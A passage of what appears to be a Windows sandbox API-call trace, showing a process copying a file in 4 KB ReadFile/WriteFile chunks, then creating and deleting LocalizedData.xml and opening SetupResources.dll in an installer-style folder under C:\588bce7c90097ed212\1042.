returned 0x0 [0068.263] SetLastError (dwErrCode=0x0) [0068.263] GetLastError () returned 0x0 [0068.263] SetLastError (dwErrCode=0x0) [0068.263] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.263] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.263] GetLastError () returned 0x0 [0068.263] SetLastError (dwErrCode=0x0) [0068.263] GetLastError () returned 0x0 [0068.263] SetLastError (dwErrCode=0x0) [0068.263] GetLastError () returned 0x0 [0068.263] SetLastError (dwErrCode=0x0) [0068.264] GetLastError () returned 0x0 [0068.264] SetLastError (dwErrCode=0x0) [0068.264] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.264] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.264] GetLastError () returned 0x0 [0068.264] SetLastError (dwErrCode=0x0) [0068.264] GetLastError () returned 0x0 [0068.264] SetLastError (dwErrCode=0x0) [0068.264] GetLastError () returned 0x0 [0068.264] SetLastError (dwErrCode=0x0) [0068.265] GetLastError () returned 0x0 [0068.265] SetLastError (dwErrCode=0x0) [0068.265] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.265] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.265] GetLastError () returned 0x0 [0068.265] SetLastError (dwErrCode=0x0) [0068.265] GetLastError () returned 0x0 [0068.265] SetLastError (dwErrCode=0x0) [0068.266] GetLastError () returned 0x0 [0068.266] SetLastError (dwErrCode=0x0) [0068.266] GetLastError () returned 0x0 [0068.266] SetLastError (dwErrCode=0x0) [0068.266] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.266] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.266] GetLastError () returned 0x0 [0068.266] SetLastError (dwErrCode=0x0) [0068.266] GetLastError () returned 0x0 [0068.266] SetLastError (dwErrCode=0x0) [0068.266] GetLastError () returned 0x0 [0068.266] SetLastError (dwErrCode=0x0) [0068.267] GetLastError () returned 0x0 [0068.267] SetLastError (dwErrCode=0x0) [0068.267] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.267] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.267] GetLastError () returned 0x0 [0068.267] SetLastError (dwErrCode=0x0) [0068.267] GetLastError () returned 0x0 [0068.267] SetLastError (dwErrCode=0x0) [0068.267] GetLastError () returned 0x0 [0068.267] SetLastError (dwErrCode=0x0) [0068.267] GetLastError () returned 0x0 [0068.267] SetLastError (dwErrCode=0x0) [0068.268] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.268] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.268] GetLastError () returned 0x0 [0068.268] SetLastError (dwErrCode=0x0) [0068.268] GetLastError () returned 0x0 [0068.268] SetLastError (dwErrCode=0x0) [0068.268] GetLastError () returned 0x0 [0068.268] SetLastError (dwErrCode=0x0) [0068.268] GetLastError () returned 0x0 [0068.268] SetLastError (dwErrCode=0x0) [0068.268] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.269] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.269] GetLastError () returned 0x0 [0068.269] SetLastError (dwErrCode=0x0) [0068.269] GetLastError () returned 0x0 [0068.269] SetLastError (dwErrCode=0x0) [0068.269] GetLastError () returned 0x0 [0068.269] SetLastError (dwErrCode=0x0) [0068.269] GetLastError () returned 0x0 [0068.269] SetLastError (dwErrCode=0x0) [0068.269] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.270] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.270] GetLastError () returned 0x0 [0068.270] SetLastError (dwErrCode=0x0) [0068.270] GetLastError () returned 0x0 [0068.270] SetLastError (dwErrCode=0x0) [0068.270] GetLastError () returned 0x0 [0068.270] SetLastError (dwErrCode=0x0) [0068.270] GetLastError () returned 0x0 [0068.270] SetLastError (dwErrCode=0x0) [0068.270] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.270] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.271] GetLastError () returned 0x0 [0068.271] SetLastError (dwErrCode=0x0) [0068.271] GetLastError () returned 0x0 [0068.271] SetLastError (dwErrCode=0x0) [0068.271] GetLastError () returned 0x0 [0068.271] SetLastError (dwErrCode=0x0) [0068.271] GetLastError () returned 0x0 [0068.271] SetLastError (dwErrCode=0x0) [0068.271] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.271] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.271] GetLastError () returned 0x0 [0068.272] SetLastError (dwErrCode=0x0) [0068.272] GetLastError () returned 0x0 [0068.272] SetLastError (dwErrCode=0x0) [0068.272] GetLastError () returned 0x0 [0068.272] SetLastError (dwErrCode=0x0) [0068.272] GetLastError () returned 0x0 [0068.272] SetLastError (dwErrCode=0x0) [0068.272] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.272] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.272] GetLastError () returned 0x0 [0068.272] SetLastError (dwErrCode=0x0) [0068.273] GetLastError () returned 0x0 [0068.273] SetLastError (dwErrCode=0x0) [0068.273] GetLastError () returned 0x0 [0068.273] SetLastError (dwErrCode=0x0) [0068.273] GetLastError () returned 0x0 [0068.273] SetLastError (dwErrCode=0x0) [0068.273] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0068.273] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.273] GetLastError () returned 0x0 [0068.273] SetLastError (dwErrCode=0x0) [0068.273] GetLastError () returned 0x0 [0068.273] SetLastError (dwErrCode=0x0) [0068.274] GetLastError () returned 0x0 [0068.274] SetLastError (dwErrCode=0x0) [0068.274] GetLastError () returned 0x0 [0068.274] SetLastError (dwErrCode=0x0) [0068.274] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0xed6, lpOverlapped=0x0) returned 1 [0068.274] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0068.274] GetLastError () returned 0x0 [0068.274] SetLastError (dwErrCode=0x0) [0068.274] GetLastError () returned 0x0 [0068.274] SetLastError (dwErrCode=0x0) [0068.274] GetLastError () returned 0x0 [0068.274] SetLastError (dwErrCode=0x0) [0068.275] ReadFile (in: hFile=0x420, lpBuffer=0x84fb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x84fb8*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0068.275] GetLastError () returned 0x0 [0068.275] SetLastError (dwErrCode=0x0) [0068.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6) returned 0x7cf90 [0068.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d798 [0068.275] GetLastError () returned 0x0 [0068.275] SetLastError (dwErrCode=0x0) [0068.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0068.275] WriteFile (in: hFile=0x410, lpBuffer=0x85fc0*, nNumberOfBytesToWrite=0xee0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x85fc0*, lpNumberOfBytesWritten=0x327ef70*=0xee0, lpOverlapped=0x0) returned 1 [0068.275] GetLastError () returned 0x0 [0068.275] SetLastError (dwErrCode=0x0) [0068.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0068.275] GetLastError () returned 0x0 [0068.275] SetLastError (dwErrCode=0x0) [0068.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0068.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0068.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0068.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0068.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85fc0 | out: hHeap=0x20000) returned 1 [0068.276] CloseHandle (hObject=0x410) returned 1 [0068.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0068.278] CloseHandle (hObject=0x420) returned 1 [0068.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0068.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0068.278] AreFileApisANSI () returned 1 [0068.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0068.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x719c8 [0068.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 45 [0068.279] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0068.280] GetFileType (hFile=0x420) returned 0x1 [0068.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0068.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x84fb8 [0068.280] GetLastError () returned 0xb7 [0068.280] SetLastError (dwErrCode=0xb7) [0068.280] WriteFile (in: hFile=0x420, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0068.439] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0068.439] CloseHandle (hObject=0x420) returned 1 [0068.562] AreFileApisANSI () returned 1 [0068.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0068.562] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0068.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 45 [0068.562] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml")) returned 1 [0068.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0068.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0068.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0068.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0068.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0068.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0068.563] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0068.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0068.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0068.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0068.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0068.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b680 | out: hHeap=0x20000) returned 1 [0068.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0068.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0068.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0068.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e458 | out: hHeap=0x20000) returned 1 [0068.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.564] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.564] FindNextFileW (in: hFindFile=0x781d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0068.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0068.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0068.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0068.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0068.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0068.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0068.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0068.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0068.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0068.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0068.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0068.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0068.564] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.564] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0068.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0068.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0068.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x717c0 [0068.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0068.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0068.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0068.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0068.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0068.565] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0068.565] AreFileApisANSI () returned 1 [0068.565] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1042\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1042\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0068.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.565] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0068.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0068.565] AreFileApisANSI () returned 1 [0068.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0068.565] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x717c0 [0068.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 46 [0068.565] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0068.566] GetFileType (hFile=0x420) returned 0x1 [0068.566] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0068.566] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0068.566] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0068.566] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0068.566] CloseHandle (hObject=0x420) returned 1 [0068.567] AreFileApisANSI () returned 1 [0068.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0068.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71620 [0068.567] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x71620, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 46 [0068.567] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0068.567] GetFileType (hFile=0x420) returned 0x1 [0068.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0068.567] CloseHandle (hObject=0x420) returned 1 [0068.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0068.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0068.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0068.567] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0068.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0068.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0068.567] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0068.567] HeapFree 